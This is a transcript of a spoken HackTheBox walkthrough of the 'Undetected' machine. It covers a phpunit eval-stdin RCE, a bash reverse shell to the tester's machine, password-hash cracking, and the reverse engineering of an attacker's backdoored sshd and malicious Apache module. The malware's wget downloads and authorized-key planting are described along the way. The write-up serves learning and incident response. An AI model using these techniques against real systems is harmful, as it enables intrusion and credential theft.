What's going on YouTube? This is Ipsec. I'm doing Undetected from HackTheBox, and I didn't do a lot of prep for this video because the whole premise behind the box is pretty cool and I thought no prep would benefit that. The initial shell is pretty standard. It's just finding a PHP directory called phpunit that has a known RCE in it to get a shell on the box. But once you get a shell, that's where this box differs from a lot. It's all about like an instant response investigation on this Linux box, tracking what the attacker did, tracing his or reversing his binaries, and preventing via a backdoor that he put in by custom compiling the SSH server daemon. He also puts like an Apache module in there and does a bunch of other things. So yeah, let's just jump in. As always, we start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it undetected, and then the IP address of 10.10.11.146. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is SSH on port 22, and its version just says it's OpenSSH. The next port we have is HTTP on port 80, and its banner is telling us it's Apache HTTPD on Ubuntu. And now this is weird because most Ubuntu machines disclose the version in the SSH banner. This machine does not, so SSH has definitely been tampered with, probably just general security hardening, but if they removed the fact that Ubuntu is running on SSH, I'm surprised whatever security policy they ran didn't apply it also to Apache, because you can just have Apache say this is just Apache HTTPD, but that's a side tangent. We may get into that at the end of this video, why that's important. We have HTTP title is Diana's Jewelry. So let's go take a look at the website. So going to 10.10.11.146, we get a web page that looks like it is just a general jeweler. Going through this, I don't see anything too unique. The main things I'm looking for is like copyright dates that can tell me how old this website is. If it was like 2018, 2017, I may try some super old vulnerabilities. This says 2021, which is actually good. Because there's always a chance in these footers that this is generated dynamically. Maybe it's like a PHP website and it just grabs the current year and puts that there. But it's currently 2022, so we know the website doesn't do that. So chances are the last time this website was updated was sometime in 2021. The next thing I'm going to do is just try like index.php to see if it comes back. It does, so it's a PHP thing. I try index.html, it does it again. ASD, it looks like everything is doing it, so I did not confirm it was running PHP. Clicking these links, we see it does go to .html. If we click on store, it's going to store.djewelry.htb. So let's go and add this to our host file. So sudo vi etc host 10.10.11.146. Paste this in, get rid of the HTTP, and then refresh this page, and it's going to the same thing. We do have a login form, but it says due to our website migration, we are currently not taking any online orders. If you wish to make a purchase, contact us, and the link's dead. If we click on account and everything else, it's going to the same thing. So at this point, we probably should run a gobuster. So I'm going to do gobuster directory mode -u, HTTP 10.10.11.146, our word list, opt sec list, discovery, web content, raft small words, .text. And this is actually a PHP extension. If I just do /cart, is it going to go there? It goes to a 404. That's interesting. Let's do /asd. So this looks like the same site, right? The store.djewelry.com. But if I go to 10.10.11.146, and I go to /asd, oh, maybe I just didn't get enough time earlier. But index.asd. Yeah, I probably didn't give enough time. I saw the animation and just assumed. But it is PHP. Is it also HTML? No. So index.html exists here, but not here. Interesting. But let's just do extension PHP. out file. I'm going to call this gobuster.out. And just looking at what it shows. So there's really nothing of interest yet. Everything's either 403 or 301. This 200 OK is just a period, so nothing interesting. I should have ran gobuster earlier because then it would be further along. That's why you should always have recon going in the background, because you can't hack time. So it's better just to start these long-running tools up front, so by the time you want to look at them, it's already ran. We do have contact@djewelry.htb as a potential email address. Phone number. Looking at all these links, nothing goes anywhere. We could like try login.php, like login.back.php, and try to find like a backup file. GoBuster does have the backup option to automatically find those things, as does PharaohBuster. Could have ran it with that, but I chose not to. Maybe once we get a output list, if we don't find anything, that's when I will do it. Always kind of just think of things as you click around while things work. If I add something to a cart, nothing works. Looking at other promotions, this has a page, but these page things don't go. If I saw like products.php and page equals 1, then I'd try for SQL injection there, but it doesn't look like that works either. New collection, product, so nothing really of interest. I'm just going to, search for 200, so everything like that stands out. We do have a /server status, but that is 403'd. I'm getting some more. Anytime we do a dot, it looks like, maybe we get a 403, or maybe it's only if it begins with like .ht. So if I do .asd, nothing happens. .ht, yeah, if it begins with .ht, we're getting forbidden. .h is fine, and that's probably just a way to forbid access to like .ht access, .ht passwd, .ht whatever else there is that may be sensitive. Instead of doing like a blacklist of every file you know about, sometimes it's better to just do a blacklist of the first few characters. That way, there's files that you don't know about also get hit with this blacklist. Looking up, I don't see anything else. Again, just going down this list, we may have wanted to run this without the PHP extension because this doubles the time it takes. If we weren't running it with the PHP extension, we'd be at 50% right now. Let's see. Is there anything else we possibly could have missed? If not, then I'm just going to pause the video and wait for that to finish. We could like download these images, look at the metadata. It is in /images, and this is a open directory. If we go to the parent directory, it just goes to the site. But we could look through these images, see if anything stands out. Most of the images are from 2014. Here's some 2019s, but it looks like it's just stock photos, video image. Don't know where that is on the site, but I was looking for like some weird image that stood out that could be like a password or something. GP, this is Google Plus social media, so nothing of interest there. So I'm just going to let this GoBuster finish, and we'll see what happens when it's done. Okay, so GoBuster has finished, but we don't really see all that much. I did have that out file, and this is the main reason why I use it, because I can just do grep-v and then search for like 403. I do a space just to make sure the string starts with 403. I could also add this parentheses, and the reason why I do that is in case the size was like 24038, I'm not excluding that line, right? And when we do that, we don't see anything. So let's go take a look back at this. We did have store.djewelry.htb and this, and while they look the same, they aren't. They're slightly different. We have the header here. This is new collection necklace earrings. That's the same. A lot of it's the same. We just pretty much have this header. And does the footer exist on the bottom? It does. So really the only thing that changes is this header. So we also know that some of the like functionality changed, right? Such as like index.asd, things like that. But let's go back to a GoBuster. And we're going to replace with the host file. And I'm going to take off the extension just so it goes a bit faster. And I think I can do a -t. I forget what the default threads is. Do we have it here? Let's see. Threads, it's at 10. I'm going to change it to 50. And we're going to call this gobuster. We'll do .store.out and see how long this takes. And again, like this is why I like starting my gobusters early. We do have a /vendor. So let's go take a look at what that is. That is non-default. And we have it's running PHP Composer. We have like this bin directory that is empty. Composer, I was just looking for like a config. Installed.json is saying all the libraries that are installed, I believe. So we have like deep copy, things like that. That may be helpful if we're looking for some type of old library that's vulnerable, such as maybe like image tragic, things like that. But I'm not going deep into that because we don't have any like upload. I don't even know how to send this user input other than a website or a URL, right? It's not really accepting anything. So that's why I'm not going deep down into that. We do have phpunit, and I know phpunit is actually exploitable. If I Google phpunit exploit and go to Google, we have an RCE here, and it's got a bunch of files like eval-standard in. So let's see if this exists. So if we do vendor, phpunit source util, we have this here. I wonder if I can do it in a get real quick. Echo hi. Is that going to work? Probably not. It's easiest to do this type of stuff in a post request. So let's send it over to Burp Suite. Intercept on, refresh. Let's send it to the repeater tab first. And all I'm doing is following what this said. And if we look at it, I think it just puts it in the post request, right? I know it's saying eval-standard in.php, so it's taking standard in and passing it to eval, which executes PHP code. So PHP echo hi. Maybe I didn't put it in quotes and errored out, and that's why. So that works. I'm going to try this on the standard web server, just like as a here. Nope, didn't work. Oh well. But we have it executing code. If it said like the whole PHP string, we wouldn't have it executing. We could probably do 1+1 to actually confirm. Does that work? Maybe not. There's probably a special way we have to do that math, and I don't know it in PHP. But at this point, we can run like system commands. So system, who am I? Let's see, PHP system ID. Where am I screwing up? SYSTEM. Oh, I don't have a question mark. So then we can just do --i. What is it? And this dev TCP 10.10.14.8 0. Like that, I want to say. For some reason, I'm blanking on the reverse shell syntax. NC LVNP 9001. That's not working. Let's do a --c. And then put it there. Took long to run, but we did not get it. Is my syntax wrong? It looks like I have the wrong syntax. So dev TCP 0 at bash reverse shell one line. Even the simple things, sometimes people forget them. Let's do --i. So --i, then bracket that, dev TCP 0. So I reversed my and sign on both things. There we go. That hung, and here we go, the reverse shell comes. So if you ever get like this error, make sure your ampersands are in the correct spot. So let's get a real shell. So Python C, import pty, pty.spawn, bin bash, like that. stty raw minus echo, fg enter enter. And we are now have a shell on this box. I'm going to export term is equal to x term. And then this line wrapping thing is annoying. As you see, it's not just going to the next line. So what I'm going to do is stty-a, we're 26 rows, 105 columns. So stty rows 26, columns 105. And now our line does not wrap. 26, columns 105. Export term is equal to x term. Maybe I didn't do it in capital. We see I did term in lowercase. So I swapped the casing. Apparently today is a case of me reversing everything. I'm not sure exactly why, but there we go. Oh, let's see. So we're dub data on this box. One thing I always like doing is going to the home directory, which of course we're going to be here. We can find .grep config and see if we have anything. We don't. We can do sslntp. And here I was looking to see if like 3306 was listening, because that would indicate like MySQL. If there was a database, then we could actually go in the configuration. But there's no database listening here, so I don't have to go look for a config file. It should be worth mentioning, like in an actual environment, you would not only look at sslntp, but just ntp or maybe ANT to look at all the connections, because the MySQL server may be listening on a remote host. So no database here. What else can we do? We can find all the files owned by dub data. So we can do find /-user dub-data to dev null. And let's see. I'm going to grep-v. We don't care about /proc. /run. Var dub we already know. So is there anything else? Did I see var dub there? What am I getting? That's weird. /proc. Oh, there's no space. There we go. So we can see a few things. We have /temp/files, dev pts0, var cache, and var backups info. Backups is always interesting. So if I go to backups, we have that info. I'm going to do a ls-la on info. We see it's only executable by dub data, and it was put on the box May 14th. If I do a stat on it, we could see other things. Nothing really too interesting about it, but we should go see exactly what this is. If we try to execute it, we see it is potentially a kernel exploit. We see KASLR bypass, which is kernel ASLR, and then substring FFF not found in dmessage. So this looks like an old exploit. So let's copy it back over to our box. How big is this? That's a decent size. So can we? I'm gonna be lazy, and we can copy info into var dub HTML. What? Var dub. Let's do main. So cp info there. And now if I wget 10.10.11.146/info, we download it to a box. And then we can do analysis on it, like run strings. And we see the kernel. Bin bash, and then doing a bunch of hexy stuff. I'm guessing this is all just hex, so I'm going to copy this. We can go to CyberChef to see what it is. So CyberChef gchq. Input from hex, and we have it pretty much being a bash script. So let's do v info.sh, I'll call it. And we see it's doing a wget temp files xyz authorized keys on root. Then it's going to download .main and var_lib.main, chmod it, echo something to the cron tab. Then it looks like it's echoing a line to pass WD. I'm not going to pretend to make sense of all this weird awk syntax, but we see system echo $1. So this is probably the first parameter. This is something, but here's a password string to etc passwd. And then echoing something to users.text, which we can't see. Home shell doing something with user.text. So let's go and crack this password to see if we can. It is probably going to take a little while because it is a SHA-512 encrypted password, which is relatively annoying. But we can take a look at it real quick. Pass it with no... what was I going to say? No rule files, because it cracks slow. Strings info. Why did that not find it? Because it had a quote or something. That's annoying. Less. Oh, it's a .sh. Where did I put it? Was it in this one? I did not save it. That's why. Okay. So we can copy this. And we could also, if we want to make sure we escape it correctly, if I just run this system command, it will probably work. So it's running system echo. So copy this and php-a. If we echo this, that didn't work. Let's just copy and paste and remove that one escape. There we go. SSH over to the Kraken, go into hashcat, v hashes, I'm going to call this undetected, paste this in, get rid of that escape character, get rid of this escape character, and I think we are good. So /hashcat, hashes undetected, opt wordless rocku.txt, and see how long this takes. Hopefully it doesn't take too long, but I am not positive. Maybe I should have added that -o to my command line to optimize it. But it is initializing the runtimes. And already cracked. So if we do --show, get rid of the word list, we can see the password is I hate hackers. So if we copy this and try an SU with that password, doesn't work. Let's cat etc passwd, grep for everything that ends in sh. There's Steven and Steven1. So let's do su-Steven, put in that password. Steven1, put in the password, and we get access. So there is user.text. There is no history file. If we go .ssh, nothing there. We can do a find /-user. I'm going to grep this passwd again. Etsy passwd, grep Steven. So I was a bit confused because my ID just says Steven, but we can see the user ID and GID of Steven is identical, right? So this is probably some hacker had got in and added a user and just mimicked him to be Steven. So we didn't change Steven's password. We just created a new account, Steven, duplicated his user ID and GID, and became him. So we can access everything he is doing. We do a sudo-l, put in the password, type the passwords because it's off my clipboard apparently. So I hate hackers. Maybe the sudo is actually pulling it from the regular Steven. Let's see. Paste. Okay, that's in my clipboard. So I'm guessing it's pulling it from the first Steven and not this one. So we don't have his password. But from this point, we're assuming it is going to be some type of incident response type case, right? We could do the find /-user Steven to dev null and then grep-v /proc /run /sys. See what's here. We have a var mail Steven. If we look at it, just an email, not really saying anything too important. So we should do some type of instant response on this system now. And if you watched a lot of my videos, you know the first thing I generally do on Linux machines when it comes to IR is investigate timestamps, because you can see at first the timestamps just go down to the day, right? But if we look at them, how they exist on the disk using like the stat command, we can see they go down to a much granular than a second. It's a 32-bit timestamp. And this becomes important because there's a lot of things, like if we go into /bin, let's just cd there, and then run stat on one of these, we can see the modification date has these zeros, right? And this is important to us because the file system or the package manager drops them on this, and it's in a compressed format, and that compressed format doesn't store the full 32-bit timestamp. It just stores up to the second. So if someone created a file into this directory manually, the modification date would have a more granular timestamp. So if we do find, we can do it on the current directory, -type f, -printf, and then %t to show the full timestamp, and then add %p to show the file name, or pn I think it is, and then \n to do a line break. And now we can just grep-v for all these zeros. I like just doing 4 zeros in a row. And we see nothing in this directory has been edited by a user. At least if it has, the attacker didn't go back and manually fix the timestamps, right? So let's go to just do this on /, and then we need to add a to dev null, and we're going to see this is very noisy. We have a lot of files, right? Because there's like directories like /proc, /run, what's another one? /sys. All Python files, when you run them, create a PYC file, so that's no interest to us when we do this. And enter now. The Etsy directory isn't going to be that interesting, so we could also hide that. And let's see, grub, this whole boot directory, we can hide that. We're still getting a lot of Python. I'm just going to hide Python. And then, of course, var log is always going to be written too, so we can hide that. I swear I saw Python here. Maybe not. So running this again, what do we have? Well, this home Steven, that's not interesting. Varlib, we should just hide that. Let's see. There we go. So var backups we saw. There's this var cache. Var dub, that's the website. I guess I screwed up typing Python because Python is still here. Oh, we don't put a space. There we go. Var cache, dub, user share. So there's nothing here. Another good thing with timestamps is looking for things that just have the date set, because every now and then, like, attackers like going back and modifying it, and when they type a timestamp, they generally just type it up to the day. And if they do that, then everything else is going to be blank, right? So let's search for hour 0, minute 0, second 0. And we should hide, let's see, grep-v. We want to do /sys/proc/run. And we just get one file, this user sbin sshd-n, which is suspicious. If I do a lsla on it, I don't want to do pn. I just want to do %p. There we go. Everything was ending in n because I had that n there. User error, but so p is path. So that's why it's %p. So this user bin sshd, if we do a du-hs on it, we can see it's 3.5 megs, and du-hs on user sbin shd, it's 868K. So there's definitely something interesting in this binary. If I run a strings against it, we can't. So let's just copy, let's see, cp shd, cp user sbin shd var dub main. And I can't because I'm not dub data. So let's just get another shell. Do this, cp user sbin shd to var dub main. And now we can wget 10.10.11.146. I think that's the IP /shd. Yep, it is downloading. So for this one, running strings may not be good because it's so big and it may be hard to find it, but let's look at it anyways. There's a lot of functions here. Let's see. I'm going to do strings grep for system. See if there's anything here. Let's see. Base 64. I'm not sure. So let's just open this up in Ghidra to see if there's anything that helps us with this. So loading it up. Close. File. New project. Don't care about the name. Click the dragon icon, then hit I to import it. And then we can go HTB. What is it? Undetected. SSHD. Okay. Has not been analyzed. Let's analyze it now. And I'm going to pause the video, wait for all these things to finish working. Okay, so everything's done, and we don't have really a lot to go off of. If we look at the exports, we can see this is not a stripped binary because we have all the functions and everything. There is one thing we could do that isn't going to be realistic, so we won't go down this path far enough. But if we looked at strings and grepped like back, we see like backdoor active, backdoor.h. So we could find all these functions, kind of look at the cross references. If we go to the exports, I actually had it stopped on it, but we see like backdoor active, and then we look, we can see all the functions that it's in. So we could kind of trace it back or look at backdoor.h and see everything it kind of touches. But this isn't really how you'd do something like this in real life, because number one, the binary will be stripped, and it also won't have these nice things like backdoor.h. So you'd go in functions like auth password and kind of look at its routine, right? And we can see, because it's not stripped, we have all the variable names right here. But I can see it's saying a backdoor thing and doing an XOR, right? So this is probably how you'd find it, just looking at all the legitimate functionality of it and kind of tracing it and looking for weird things. Now, this is kind of odd how it's set, because we see backdoor, then 24 of 4, and then 4 bytes of hex, or maybe bits of hex. I always get bits and bytes confused, but 16 and then 8, and this is double the length of this, so that's handy, I guess. And this 16, 24, 0, 4, 8, we have 28, 2 here. So this is indicating the position, and then this is indicating the length. This one is only 1, and it doesn't have a length. Oddly enough, it is, I believe, signed right now. We see this one being negative. If we right-click it, we can see the real value is a 5. But what we want to do is get this into a variable, kind of reassemble it, and then what it does is a XOR of the character 96 against it, and then compares the password. If it matches, it lets you in. So let's try that. I'm going to go to CyberChef, so GCHQ again. We have it right here. So we can, I guess, leave the from hex, because we're still dealing in hex. So I'm going to copy each of these values. So copy this. Then we can copy this. 8 is next. Then the next one will be this. So 12, 16. And I don't know if we're going to have to eventually break this one up. Let's see, 24. Then this. And finally, this one, A5. Okay, so we can see the output doesn't really work, but we can XOR it, right? And we know the XOR value was 96. The XOR symbol is this X power caret, whatever you want to call it. So 0x96. And now it's just plain text. So we can try logging in with this. So SSH root at 1010 11 146. And it doesn't work. Now, this could be an NDNS problem. Like maybe this string did not start with F0, it's actually D6. And CyberChef makes that easy for us. We can just swap NDNS, leave that there at 4 bytes, and see what happens here. So we SSH, and it still doesn't work. And I'm guessing it's probably related to this, because it's reading it 4 bytes at a time, and then probably going to pad this one. If we undo this to undo the padding. Does it work this way? It does not. Let's move this A5 to here. And see if this one works. Oh, I think I've been pasting. Oh, I copied that. I don't know how that happened. There we go. Paste this. Still didn't work. Let's try A5 here. Copy. Paste. And that's not letting us in. So it could also be with this big string. So let's try putting this one here. And there we go. We get in. So we got root.text right there. So what was happening is because we specified like 4 bytes in length, I think we just wanted each of these to be 4. And when we didn't do the padding, like the whole end-ENS swap just got weird because this one only had 2, this one had 1 on the thing. So that's why we were trying to move it up to make it as, I guess, symmetrical as possible. We can't add a 0 there. Yeah. If we added a null byte, then it just adds it to the end, which is string termination. But I actually don't think this is a null byte at the end because we null it out. It's probably just a non-ASCII printable character. But yeah, that is pretty much the box. We did skip one whole step because if we paid attention to the email as Steven, we can go back and do that step real quick. Let's see, cat var spool mail Steven, because they talk about weird behavior with the Apache service. This was actually a hint to go into the Apache config. And if we look at mods enabled and look at these, one of these is odd, I want to say. Reader.load. Reader isn't a normal Apache module. Maybe the timestamps would have helped with this. So if we go mods available, is this one completely different? Everything's 2020. Let's see. Grep reader. We see reader is 2021. So if we do lsla grep-v 2020, we would see the mod reader module was added relatively recently. And this is another backdoor that points people to the other one. So I'm going to copy this one. So let's do cd etc apache 2 mods available. And then we can copy mod reader.o to for www main. Okay. And wget 1010 11 146 mod reader.o. If I strings this file, do we get anything interesting? Not sure. This looks like it could be a base 64 string. This alphabet's definitely indicating there is base 64 there. Generally, when you see like a whole alphabetic string, that's what it means. We have to fix that. Base 64-D. And yeah, we can reverse it this way as well. I'm going to put a blank line first. So we can see it's doing a wget, downloading image.jpg, saving it as sshd, and then doing this touch command. And this is how we actually found it, because it does a touch and then grabs the date of Apache tool enable mod, and then sets that date on user sbin sshd. But because the date string they grabbed ends at the actual like date or day, doesn't go into the minutes, seconds, whatever, that's why it started out of being all zeros, because they just did a bad clone timestamp of something. So it's actually funny that we found the file because of bad time stomping and not tracing the full path of it. If we wanted to, we could have opened this file in Ghidra as well. So I could close out of this. All of these you could reverse as well with Ghidra, but as John Hammond says, strings is overpowered. Like, you'd be surprised at what you can find in strings and a little bit of guessing, right? Like, we just saw something that looked like base64, try decoding it, and done, right? If we do the exports, we can see base64 decode. What is reader module? Why didn't this decompile? I'm going to try it again. Shouldn't be talking while I do some things. And let's see. Open modreader.o elf. That looks fine. Yes to analyze. Analyze everything. Okay. Exports. Reader module. Why isn't this decompiling? Okay. Decode block. Base64 decode. That's how it's doing it. Let's see. This is module. Modreader.c. Entry point. I've never really... Well, I guess I have opened modules in Ghidra, but it's been a while. Let's see, can we find, what is the cross-reference here? So we can see it's called by these functions. What are you? Base64 decode. Let's see, if we go to namespaces, nope. Classes, nope. Looks like base64 makes this a lot easier. Because we got decode block. I don't think this is it though. We gotta, I guess, find what decode block is called by. Entry point, B64 decode. What is this string? So at this point, I'm guessing Ghidra just completely failed me. Maybe I should update it, but I'm going to switch to a different decompiler, and we're going to see what that does. Let's see. I think I have Cutter installed, right? Is it just that? Yeah. So I downloaded this. Let's see. I'm sure if you go to ipsec.rocks, I'll have a thing, but I just downloaded from cutter.re. We could probably try downloading it again because I don't know what version I had uploaded. And download failed. Why do you fail? This is like not going well. Do I just not like have space on my machine, or let's see, copy link, wget, no space left, df-lh. Let's see, HTB, DUHS. Do we have anything that's a gig? Can delete that. Download. Completed. Awesome. So CD, downloads. I'm going to close this one because I have no idea what version that is. Let's see. We should make this executable. 205, that is not it. Oh god, I have a lot of these. 210. V210. There we go. So now we can select the file, and we're going to go up a directory, HTB, undetected, and then mod reader. Let's see what this does. And this is always the issue when I do things live. Every now and then, things just really don't make sense. Let's see. We're just getting the base64 decode. See, decode block. I'm looking for the big base64 string. Here we go. So this sim hook post config. So this looks better. It's hooking probably Apache after the configuration. And then we see it passing this big base64 string to b64 decode. And then doing an exec, right? So it's doing bin bash against this string. And we've already decoded it, so we could do it again. But echo-n base64-d, right? So we saw this. So let's go back to Ghidra. And I closed it out, but I just want to see if I can find it real quick. Ghidra run. And then open up mod reader. Then we can reopen this file, mod reader. Let's give it a different name so we can reanalyze it. I want to make sure that one function did not exist. I don't see a post config. If we go here, ap hook post config, it's got a bunch of question marks here, so it did not fully handle that. Ah, here it is, hooks post config. So if we found it in the actual function hook post config, we can see Ghidra decompiling it. And one of the main differences between Ghidra's decompiler and Cutter's, which uses R2, is it tells you the registers here, but Ghidra just kind of does that in arguments and tries to make it, I guess, different, like readable that way. We could change the decompiler mode. If we do it in Ghidra, it tries giving it kind of a Ghidra-like syntax, but it doesn't really hit the mark. I always like this one better, but both tools do find it as long as you know how to use them. Apparently I don't. So hope you guys enjoyed the video. Take care, and I'll see you all next week.